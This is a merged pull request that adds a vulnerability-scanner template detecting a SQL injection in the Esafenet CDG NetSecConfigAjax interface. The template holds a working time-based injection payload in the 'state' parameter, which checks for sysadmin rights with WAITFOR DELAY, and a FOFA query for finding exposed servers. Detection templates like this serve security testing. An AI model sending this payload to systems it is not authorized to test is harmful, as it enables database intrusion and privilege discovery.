Merge pull request #10372 from adeljck/esafenet-NetSecConfigAjax-Sqli

add esafenet-NetSecConfigAjax-Sqli.yaml

http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml

@@ -0,0 +1,31 @@
+id: esafenet-netsecconfigajax-sqli
+
+info:
+  name: Esafenet CDG NetSecConfigAjax - Sql Injection
+  author: adeljck
+  severity: high
+  description: |
+    The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
+  metadata:
+    verified: true
+    vendor: esafenet
+    max-request: 1
+    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+  tags: esafenet,sqli
+
+http:
+  - raw:
+      - |
+        POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type,"text/html")'
+          - 'contains(body,"操作成功")'
+          - 'status_code == 200'
+        condition: and